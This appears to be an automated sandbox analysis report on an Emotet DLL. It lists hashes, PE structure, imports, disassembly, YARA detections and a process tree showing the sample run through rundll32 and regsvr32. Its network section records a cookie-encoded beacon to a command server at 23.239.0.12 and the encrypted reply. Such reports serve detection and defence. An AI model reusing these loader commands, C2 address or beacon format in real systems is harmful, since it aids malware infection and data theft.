                                                                  • Generic Win/DOS Executable (2004/3) 1.70%
                                                                  • DOS Executable Generic (2002/1) 1.70%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                  File name:x4ByCNJqst.dll
                                                                  File size:545280
                                                                  MD5:8978c658ba95819f72866e0ffc41fa81
                                                                  SHA1:f8eed4cba5ff946b074a9b2f95e2fb92c0427651
                                                                  SHA256:50363092e6becfe6ad91c4118fcb2e9207ebb6d2016de3459d56b41fbc3b61c1
                                                                  SHA512:0b093d2867d42ea43caa0e59cd5d6913a3552eec6ea13eb0fa9bb1a67dcf5841fb481d4090d9fe71f216dabd350909679df891423ed15df3a346221d7842f90d
                                                                  SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZIHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVg
                                                                  TLSH:41C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."

                                                                  File Icon

                                                                  Icon Hash:74f0e4ecccdce0e4

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x1800423a8
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x180000000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:2
                                                                  File Version Major:5
                                                                  File Version Minor:2
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:2
                                                                  Import Hash:b268dbaa2e6eb6acd16e04d482356598

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  dec eax
                                                                  mov dword ptr [esp+08h], ebx
                                                                  dec eax
                                                                  mov dword ptr [esp+10h], esi
                                                                  push edi
                                                                  dec eax
                                                                  sub esp, 20h
                                                                  dec ecx
                                                                  mov edi, eax
                                                                  mov ebx, edx
                                                                  dec eax
                                                                  mov esi, ecx
                                                                  cmp edx, 01h
                                                                  jne 00007F9804DBEEE7h
                                                                  call 00007F9804DC1074h
                                                                  dec esp
                                                                  mov eax, edi
                                                                  mov edx, ebx
                                                                  dec eax
                                                                  mov ecx, esi
                                                                  dec eax
                                                                  mov ebx, dword ptr [esp+30h]
                                                                  dec eax
                                                                  mov esi, dword ptr [esp+38h]
                                                                  dec eax
                                                                  add esp, 20h
                                                                  pop edi
                                                                  jmp 00007F9804DBED90h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  mov dword ptr [esp+08h], ecx
                                                                  dec eax
                                                                  sub esp, 00000088h
                                                                  dec eax
                                                                  lea ecx, dword ptr [00014D05h]
                                                                  call dword ptr [0000FC7Fh]
                                                                  dec esp
                                                                  mov ebx, dword ptr [00014DF0h]
                                                                  dec esp
                                                                  mov dword ptr [esp+58h], ebx
                                                                  inc ebp
                                                                  xor eax, eax
                                                                  dec eax
                                                                  lea edx, dword ptr [esp+60h]
                                                                  dec eax
                                                                  mov ecx, dword ptr [esp+58h]
                                                                  call 00007F9804DCDA6Ah
                                                                  dec eax
                                                                  mov dword ptr [esp+50h], eax
                                                                  dec eax
                                                                  cmp dword ptr [esp+50h], 00000000h
                                                                  je 00007F9804DBEF23h
                                                                  dec eax
                                                                  mov dword ptr [esp+38h], 00000000h
                                                                  dec eax
                                                                  lea eax, dword ptr [esp+48h]
                                                                  dec eax
                                                                  mov dword ptr [esp+30h], eax
                                                                  dec eax
                                                                  lea eax, dword ptr [esp+40h]
                                                                  dec eax
                                                                  mov dword ptr [esp+28h], eax
                                                                  dec eax
                                                                  lea eax, dword ptr [00014CB0h]
                                                                  dec eax
                                                                  mov dword ptr [esp+20h], eax
                                                                  dec esp
                                                                  mov ecx, dword ptr [esp+50h]
                                                                  dec esp
                                                                  mov eax, dword ptr [esp+58h]
                                                                  dec eax
                                                                  mov edx, dword ptr [esp+60h]
                                                                  xor ecx, ecx
                                                                  call 00007F9804DCDA18h
                                                                  jmp 00007F9804DBEF04h
                                                                  dec eax
                                                                  mov eax, dword ptr [eax+eax+00000000h]

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2008 build 21022
                                                                  • [LNK] VS2008 build 21022
                                                                  • [ASM] VS2008 build 21022
                                                                  • [IMP] VS2005 build 50727
                                                                  • [RES] VS2008 build 21022
                                                                  • [EXP] VS2008 build 21022
                                                                  • [C++] VS2008 build 21022

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x520000x3d5f0x3e00False0.355342741935data5.39270768906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                  RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                                                  Imports

                                                                  DLLImport
                                                                  KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                  ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc

                                                                  Exports

                                                                  NameOrdinalAddress
                                                                  DllRegisterServer10x180042050
                                                                  DllUnregisterServer20x180042080

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 14, 2022 04:46:01.021106958 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:01.021159887 CEST4434978923.239.0.12192.168.2.7
                                                                  May 14, 2022 04:46:01.021250010 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:01.047135115 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:01.047177076 CEST4434978923.239.0.12192.168.2.7
                                                                  May 14, 2022 04:46:01.595927000 CEST4434978923.239.0.12192.168.2.7
                                                                  May 14, 2022 04:46:01.596092939 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:01.937185049 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:01.937206984 CEST4434978923.239.0.12192.168.2.7
                                                                  May 14, 2022 04:46:01.937649012 CEST4434978923.239.0.12192.168.2.7
                                                                  May 14, 2022 04:46:01.937730074 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:01.940763950 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:01.984502077 CEST4434978923.239.0.12192.168.2.7
                                                                  May 14, 2022 04:46:02.795677900 CEST4434978923.239.0.12192.168.2.7
                                                                  May 14, 2022 04:46:02.795754910 CEST4434978923.239.0.12192.168.2.7
                                                                  May 14, 2022 04:46:02.795877934 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:02.796772957 CEST49789443192.168.2.723.239.0.12
                                                                  May 14, 2022 04:46:02.796799898 CEST4434978923.239.0.12192.168.2.7

                                                                  HTTP Request Dependency Graph

                                                                  • 23.239.0.12

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.74978923.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-05-14 02:46:01 UTC0OUTGET / HTTP/1.1
                                                                  Cookie: QDGlPmKOb=TX/dVeT7lyH5ngHmnxMFxqFeFIckgyS+eTvFxPj70GF45WQbYgIR5YD52OsRDc9blkyjiUa0Yqe6pSbgy2DVASEEWQlhPFUSnkyvs1j9fcs/03LtUxyEgokNnTm9BdbgUKLysz+GIHunJ3ICf+MbOMPcxyDQMEPxDtn7pCNcxuY2bJ346K6C6yeS1bR8Vwv7L6AvzN/6XVrUEvcLceWiPnN+L5HntiDuAJ2t3QmxGdGoD743iGvw+oldDKvtdideoP8CRqfM0HELQHL9xZ/PA34HGO1+ThmvKp607np2POFA3Gk1Jr7OalPDwf6Z5NEvJ+AZRsVDKA==
                                                                  Host: 23.239.0.12
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  2022-05-14 02:46:02 UTC0INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Sat, 14 May 2022 02:46:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  2022-05-14 02:46:02 UTC0INData Raw: 32 65 62 0d 0a e1 03 3b 6b 60 0b 5e c5 dc c0 8a ce a3 4d 5b 5e ce 09 61 13 f3 35 44 5f c3 47 23 36 69 ed 57 e1 9d 51 9b 58 99 11 86 a8 f4 08 c9 33 21 04 07 b2 ee 71 3d 07 90 97 02 46 7d 72 75 fc ae 0a 68 d5 70 6f 64 72 17 6d 53 b9 ff 08 06 40 45 d5 69 01 12 bc fe f8 d0 f4 9e ef f9 ec 4e aa 7c e5 7b ef 67 3e 10 4b 6e 73 de bb 00 62 47 7b c1 e2 e2 ec 4a af 60 a4 09 ee ae 97 38 62 2c b3 9a 09 8b 4e 9d 2d 7b 77 11 c7 02 47 7a ba 4d 68 42 81 8b cf 76 34 a9 76 42 e6 09 3a 52 a0 08 a4 5d fa 06 c3 2b 25 a7 14 2e 25 45 18 8a b7 98 b0 43 20 7b 80 d8 dc 6d 78 01 08 1b df fb c5 b3 24 90 ed 91 57 4f a4 a1 f1 11 c3 ad 11 02 a9 32 63 ca 83 6e ad 26 45 c3 65 1a 21 c0 49 4f 2b b2 b7 04 35 dd fb 28 98 85 3c d8 89 6d 28 e7 8a dc 8d 27 e6 a9 cb fb 74 98 08 7f a5 ca e5 52 36
                                                                  Data Ascii: 2eb;k`^M[^a5D_G#6iWQX3!q=F}ruhpodrmS@EiN|{g>KnsbG{J`8b,N-{wGzMhBv4vB:R]+%.%EC {mx$WO2cn&Ee!IO+5(<m('tR6


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:04:45:22
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\loaddll64.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\x4ByCNJqst.dll"
                                                                  Imagebase:0x7ff7d85f0000
                                                                  File size:140288 bytes
                                                                  MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:1
                                                                  Start time:04:45:23
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                                                                  Imagebase:0x7ff6a6590000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:2
                                                                  Start time:04:45:23
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dll
                                                                  Imagebase:0x7ff74df50000
                                                                  File size:24064 bytes
                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.358233793.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:3
                                                                  Start time:04:45:23
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                                                                  Imagebase:0x7ff7c98c0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.356219703.0000017092640000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:4
                                                                  Start time:04:45:24
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllRegisterServer
                                                                  Imagebase:0x7ff7c98c0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.356042845.000001A5A5EA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:5
                                                                  Start time:04:45:28
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllUnregisterServer
                                                                  Imagebase:0x7ff7c98c0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:6
                                                                  Start time:04:45:28
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll"
                                                                  Imagebase:0x7ff74df50000
                                                                  File size:24064 bytes
                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.743858456.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:7
                                                                  Start time:04:45:36
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:11
                                                                  Start time:04:46:03
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:13
                                                                  Start time:04:46:10
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:14
                                                                  Start time:04:46:31
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:16
                                                                  Start time:04:46:44
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:28
                                                                  Start time:04:47:54
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:2.5%
                                                                    Signature Coverage:16.1%
                                                                    Total number of Nodes:685
                                                                    Total number of Limit Nodes:6
                                                                    execution_graph 9735 7ff8ca9b2290 9737 7ff8ca9b22b6 9735->9737 9738 7ff8ca9b22f3 9737->9738 9744 7ff8ca9b22be 9737->9744 9747 7ff8ca9b2154 9737->9747 9738->9744 9789 7ff8ca971230 9738->9789 9741 7ff8ca9b2335 9742 7ff8ca9b2154 126 API calls 9741->9742 9741->9744 9742->9744 9743 7ff8ca971230 8 API calls 9745 7ff8ca9b2328 9743->9745 9746 7ff8ca9b2154 126 API calls 9745->9746 9746->9741 9748 7ff8ca9b2162 9747->9748 9749 7ff8ca9b21e1 9747->9749 9794 7ff8ca9b4110 HeapCreate 9748->9794 9751 7ff8ca9b221e 9749->9751 9758 7ff8ca9b21e5 9749->9758 9752 7ff8ca9b2223 9751->9752 9753 7ff8ca9b2279 9751->9753 9887 7ff8ca9b3108 9752->9887 9755 7ff8ca9b216d 9753->9755 9914 7ff8ca9b2f50 9753->9914 9755->9738 9758->9755 9761 7ff8ca9b3a48 46 API calls 9758->9761 9760 7ff8ca9b2179 _RTC_Initialize 9763 7ff8ca9b217d 9760->9763 9769 7ff8ca9b2189 GetCommandLineA 9760->9769 9764 7ff8ca9b2212 9761->9764 9892 7ff8ca9b415c HeapDestroy 9763->9892 9767 7ff8ca9b2c94 48 API calls 9764->9767 9765 7ff8ca9b2243 FlsSetValue 9770 7ff8ca9b2259 9765->9770 9771 7ff8ca9b226f 9765->9771 9768 7ff8ca9b2217 9767->9768 9898 7ff8ca9b415c HeapDestroy 9768->9898 9813 7ff8ca9b3eec 9769->9813 9899 7ff8ca9b2cbc 9770->9899 9908 7ff8ca9b3024 9771->9908 9780 7ff8ca9b21ab 9851 7ff8ca9b2c94 9780->9851 9783 7ff8ca9b21b7 9784 7ff8ca9b21cb 9783->9784 9866 7ff8ca9b3aec 9783->9866 9784->9755 9893 7ff8ca9b3a48 9784->9893 9790 7ff8ca971249 wcsftime 9789->9790 9791 7ff8ca971276 9790->9791 9792 7ff8ca9b20e0 __initmbctable 8 API calls 9791->9792 9793 7ff8ca9b203e 9792->9793 9793->9741 9793->9743 9795 7ff8ca9b2169 9794->9795 9796 7ff8ca9b4134 HeapSetInformation 9794->9796 9795->9755 9797 7ff8ca9b2fa0 9795->9797 9796->9795 9920 7ff8ca9b36f0 9797->9920 9799 7ff8ca9b2fab 9925 7ff8ca9b6970 9799->9925 9802 7ff8ca9b3014 9804 7ff8ca9b2c94 48 API calls 9802->9804 9803 7ff8ca9b2fb4 FlsAlloc 9803->9802 9805 7ff8ca9b2fcc 9803->9805 9806 7ff8ca9b3019 9804->9806 9807 7ff8ca9b3108 __wtomb_environ 45 API calls 9805->9807 9806->9760 9808 7ff8ca9b2fdb 9807->9808 9808->9802 9809 7ff8ca9b2fe3 FlsSetValue 9808->9809 9809->9802 9810 7ff8ca9b2ff6 9809->9810 9811 7ff8ca9b2cbc _set_doserrno 45 API calls 9810->9811 9812 7ff8ca9b3000 GetCurrentThreadId 9811->9812 9812->9806 9814 7ff8ca9b3f1b GetEnvironmentStringsW 9813->9814 9815 7ff8ca9b3f4d 9813->9815 9816 7ff8ca9b3f35 GetLastError 9814->9816 9817 7ff8ca9b3f29 9814->9817 9815->9817 9818 7ff8ca9b4010 9815->9818 9816->9815 9820 7ff8ca9b3f70 WideCharToMultiByte 9817->9820 9821 7ff8ca9b3f5b GetEnvironmentStringsW 9817->9821 9819 7ff8ca9b401d GetEnvironmentStrings 9818->9819 9822 7ff8ca9b219b 9818->9822 9819->9822 9823 7ff8ca9b402f 9819->9823 9825 7ff8ca9b3fbe 9820->9825 9826 7ff8ca9b3fff 9820->9826 9821->9820 9821->9822 9838 7ff8ca9b3758 GetStartupInfoA 9822->9838 9828 7ff8ca9b309c __setargv 45 API calls 9823->9828 9932 7ff8ca9b309c 9825->9932 9827 7ff8ca9b4002 FreeEnvironmentStringsW 9826->9827 9827->9822 9830 7ff8ca9b4053 9828->9830 9832 7ff8ca9b405b FreeEnvironmentStringsA 9830->9832 9833 7ff8ca9b4069 __initmbctable 9830->9833 9832->9822 9836 7ff8ca9b4077 FreeEnvironmentStringsA 9833->9836 9834 7ff8ca9b3fce WideCharToMultiByte 9834->9827 9835 7ff8ca9b3ff7 9834->9835 9837 7ff8ca9b3024 free 45 API calls 9835->9837 9836->9822 9837->9826 9839 7ff8ca9b3108 __wtomb_environ 45 API calls 9838->9839 9840 7ff8ca9b3795 9839->9840 9842 7ff8ca9b395b 9840->9842 9843 7ff8ca9b3108 __wtomb_environ 45 API calls 9840->9843 9849 7ff8ca9b21a7 9840->9849 9850 7ff8ca9b38c4 9840->9850 9841 7ff8ca9b3981 GetStdHandle 9841->9842 9842->9841 9844 7ff8ca9b39b0 GetFileType 9842->9844 9845 7ff8ca9b3a10 SetHandleCount 9842->9845 9847 7ff8ca9b7ee4 _lock InitializeCriticalSectionAndSpinCount 9842->9847 9842->9849 9843->9840 9844->9842 9845->9849 9846 7ff8ca9b38f7 GetFileType 9846->9850 9847->9842 9848 7ff8ca9b7ee4 _lock InitializeCriticalSectionAndSpinCount 9848->9850 9849->9780 9859 7ff8ca9b3df4 9849->9859 9850->9842 9850->9846 9850->9848 9850->9849 9852 7ff8ca9b2ca3 FlsFree 9851->9852 9853 7ff8ca9b2cb0 9851->9853 9852->9853 9854 7ff8ca9b6a2f DeleteCriticalSection 9853->9854 9855 7ff8ca9b6a4d 9853->9855 9856 7ff8ca9b3024 free 45 API calls 9854->9856 9857 7ff8ca9b6a5b DeleteCriticalSection 9855->9857 9858 7ff8ca9b6a6a 9855->9858 9856->9853 9857->9855 9858->9763 9860 7ff8ca9b3e11 GetModuleFileNameA 9859->9860 9861 7ff8ca9b3e0c 9859->9861 9863 7ff8ca9b3e43 __setargv 9860->9863 10078 7ff8ca9b4ecc 9861->10078 9864 7ff8ca9b309c __setargv 45 API calls 9863->9864 9865 7ff8ca9b3e97 __setargv 9863->9865 9864->9865 9865->9783 9867 7ff8ca9b3b09 9866->9867 9869 7ff8ca9b3b0e __tzset 9866->9869 9868 7ff8ca9b4ecc __initmbctable 83 API calls 9867->9868 9868->9869 9870 7ff8ca9b3108 __wtomb_environ 45 API calls 9869->9870 9874 7ff8ca9b21c0 9869->9874 9873 7ff8ca9b3b4d __tzset 9870->9873 9871 7ff8ca9b3bc6 9872 7ff8ca9b3024 free 45 API calls 9871->9872 9872->9874 9873->9871 9873->9874 9875 7ff8ca9b3108 __wtomb_environ 45 API calls 9873->9875 9876 7ff8ca9b3c02 9873->9876 9877 7ff8ca9b7fbc __tzset 45 API calls 9873->9877 9879 